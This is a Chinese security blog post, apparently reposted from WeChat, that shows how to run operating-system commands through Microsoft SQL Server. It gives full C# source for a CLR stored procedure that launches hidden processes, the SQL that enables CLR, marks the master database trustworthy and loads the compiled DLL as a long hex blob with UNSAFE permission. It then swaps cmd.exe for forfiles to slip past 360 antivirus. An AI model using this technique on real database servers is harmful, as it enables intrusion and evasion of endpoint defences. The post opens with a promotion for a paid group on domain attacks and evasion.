欢迎加入我的知识星球:目前正在更新域和免杀相关的文章,大部分会在群内交流或直接私聊我即可,等域相关的文章做的差不多了我会更新免杀的东西,每个月一次技术交流探讨,时间会在群公告,让我们卷起来吧。99的价格你买的到的不仅仅是星球内的资源,更是群内的氛围,群内杜绝划水,杜绝聊和技术无关的事情。
网上有很多的利用方式似乎调的都是cmd.exe
。
这里的绕过其实就是自定义CLR
。
我们现来使用网上公开的一些方式,首先我们需要在VS这里选择安装多个工具。
把数据库存储和处理勾选上然后安装即可。
安装之后创建一个新的项目,选择sqlserver
数据库项目。
创建成功之后,右键属性这里勾选创建脚本sql文件,目标平台更改为SQL Server 2012
因为我安装的就是2012,这里根据自己安装的版本选择即可。
然后切换到SQLCLR
这里。
目标框架设置为.net3.5以及权限级别为UNSAFE。
保存之后,我们右键项目->添加->存储过程。
创建一个存储过程。
然后将网上的代码复制过来。
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
[ ]
public static void ExecCommand (string cmd)
{
// 在此处放置代码
SqlContext.Pipe.Send("Command is running, please wait.");
SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
}
public static string RunCommand(string filename,string arguments)
{
var process = new Process();
process.StartInfo.FileName = filename;
if (!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments = arguments;
}
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.RedirectStandardOutput = true;
var stdOutput = new StringBuilder();
process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
string stdError = null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError = process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch (Exception e)
{
SqlContext.Pipe.Send(e.Message);
}
if (process.ExitCode == 0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
var message = new StringBuilder();
if (!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if (stdOutput.Length != 0)
{
message.AppendLine("Std output:");
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
}
return stdOutput.ToString();
}
}
右键重新生成之后他会给你生成一个.sql文件。
我们找到这个sql文件,里面有创建程序集的sql语句。
我们将其复制出来,然后我们去执行,这里我们直接使用mssqlclient去连接即可。
启用MSSQL CLR功能
MSSQL CLR功能默认关闭,利用以下语句启用。
sp_configure 'clr enabled', 1
RECONFIGURE
为了导入了不安全的程序集,我们还需要执行以下语句将数据库标记为安全。
ALTER DATABASE master SET TRUSTWORTHY ON;
利用SQL语句导入程序集
如下就是我们刚才生成的。
CREATE ASSEMBLY [clr_pp] AUTHORIZATION [dbo] FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300062A01660000000000000000E00022200B013000000E000000060000000000004A2C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000F82B00004F00000000400000A002000000000000000000000000000000000000006000000C000000C02A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000500C000000200000000E000000020000000000000000000000000000200000602E72737263000000A0020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C00000000600000000200000014000000000000000000000000000040000042000000000000000000000000000000002C2C00000000000048000000020005007C220000440800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A7243000070725300007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C22001106725D0000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A225187275000070A22519076F1C00000A13091209282000000AA2251A72AD000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076322E302E35303732370000000005006C000000A8020000237E000014030000AC03000023537472696E677300000000C0060000B4000000235553007407000010000000234755494400000084070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000CC0101000000000006006601B40206008601B40206003C01A1020F00D402000006003603D7010A00500154020E000F03A1020600DE01D70106002602740306002101B4020E00F402A1020A00800354020A00190154020600BA01D7010E00F601A1020E00C800A1020E003B02A10206000E02360006001B02360006002700D701000000002D00000000000100010001001000E3020000150001000100030110000100000015000100040006006A037900502000000000960083007D00010084200000000096008F001A0002005C220000000086189B02060004005C220000000086189B0206000400652200000000830016008200040000000100750000000100E800000002002503000001003402000002000A0309009B02010011009B02060019009B020A0031009B02060051009B02060061001001100069009A00150071002F031A0039009B0206003900E80132007900DB00150071009E03370079001703150079008B033C007900B80041007900A4013C00790081023C0079004F033C0049009B02060089009B02470039005E004D003900490353003900F100060039006F025700990079005C0039003D0306004100AC005C0039009F0060002900B8015C004900050164004900C1016000A100B8015C0071002F036A0029009B02060059004C005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA00200004800000000000000000000000000000000007020000020000000000000000000000700055000000000002000000000000000000000070004000000000000200000000000000000000007000D70100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F3000496E743332003C4D6F64756C653E0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E67746800636C725F70702E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F00636C725F70700053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D70747900004143006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002C00200070006C006500610073006500200077006100690074002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A00200000006CB6FD0F8D119A43950071CC186086DE000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F77730108010007010000000004010000000000000000052A016600000000020000001C010000DC2A0000DC0C00005253445366DE4342A66E3443B26CC53B4C869CA201000000433A5C55736572735C41646D696E5C736F757263655C7265706F735C636C725F70705C636C725F70705C6F626A5C44656275675C636C725F70702E706462000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202C000000000000000000003A2C00000020000000000000000000000000000000000000000000002C2C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF250020001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000036000B00010049006E007400650072006E0061006C004E0061006D006500000063006C0072005F00700070002E0064006C006C00000000002800020001004C006500670061006C0043006F0070007900720069006700680074000000200000003E000B0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000063006C0072005F00700070002E0064006C006C0000000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0000004C3C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;
创建程序集之后创建存储过程。
这里的clr_pp就是我们上一步创建的程序集,然后他去找程序集中的StoredProcedures类的ExecCommand方法。
CREATE PROCEDURE [dbo].[ExecCommand] @cmd NVARCHAR (MAX) AS EXTERNAL NAME [clr_pp].[StoredProcedures].[ExecCommand]
创建成功之后。
我们就可以来执行命令了。
exec dbo.ExecCommand "whoami";
我们会发现卡在这里了,无法执行命令。
我们回到虚拟机这里发现360给拦截了。
如上图可以看到发现可利用的程序是cmd.exe,那么我们在想能不能不通过cmd去执行命令。
当然可以,我们可以通过forfiles
进行执行。
比如说我们想执行whoami:
forfiles /c whoami
可以看到成功执行。
但是执行的太多了,我们只想让他执行一次,那么加上 /p 和 /m参数即可。
forfiles /c whoami /p c:windowssystem32 /m calc.exe
如上图可以看到现在就只执行了一次。
所以我们可以利用这种方式来执行命令。
现在让我们将上面代码中的cmd.exe更换为forfiles即可。
我们现在重新生成,还是重复上面的步骤,尝试去执行命令。
如上图可以看到是可以正常执行的。
期待和您的下次相遇!!!
原文始发于微信公众号(Relay学安全):MSSQL绕过360执行命令的小技巧